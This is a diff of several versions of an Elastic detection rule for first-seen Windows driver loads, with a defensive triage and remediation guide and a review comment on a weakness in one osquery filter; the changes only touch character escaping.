a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_3.json +++ b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_3.json 
@@ -16,7 +16,7 @@ "dll.pe.original_file_name", "dll.code_signature.subject_name" ], - "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. 
If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == 
\\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. 
Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. 
If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == 
\\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"driver\" and host.os.type:windows and event.action:\"load\"\n", "references": [ "https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks" @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_4.json b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_4.json index 1a927a91c7f..fdddc0a3e7c 100644 --- a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_4.json 
+++ b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_4.json 
@@ -16,7 +16,7 @@
"dll.pe.original_file_name",
"dll.code_signature.subject_name"
],
- "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from.
If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == 
\\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features.
Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. 
If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == 
\\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
"query": "event.category:\"driver\" and host.os.type:windows and event.action:\"load\"\n",
"references": [
"https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks"
@@ -56,7 +56,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0003",
"name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_5.json b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_5.json
index 15252562ec1..1b38937f276 100644
--- a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_5.json
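Review bot: The "Retrieve All Non-Microsoft Drivers" osquery in the new-side `note` excludes rows with `WHERE NOT (provider == "Microsoft" AND signed == "1")`, yet `provider` is driver-package metadata and `signed` only says some signature is present, so a third-party driver whose package declares provider "Microsoft" and carries any valid signature disappears from a list whose purpose is to surface such drivers. The query already joins `authenticode` and selects `subject_name` and `issuer_name`, so the exclusion should key on the signer rather than the self-declared string (with the caveat that WHQL attestation-signed third-party drivers also carry a Microsoft subject, so the result is still not a clean "non-Microsoft" set); how `drivers.provider` is populated should be confirmed against the osquery schema before relying on either column. These rule JSONs appear to be generated from the upstream rule source, so the fix belongs there rather than in this package copy. Only the `\u003e`→`>` escaping differs between the two sides of this hunk; the guide text itself is unchanged.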
+++ b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_5.json 
@@ -16,7 +16,7 @@
"dll.pe.original_file_name",
"dll.code_signature.subject_name"
],
- "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from.
If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == 
\\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features.
Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. 
If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == 
\\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
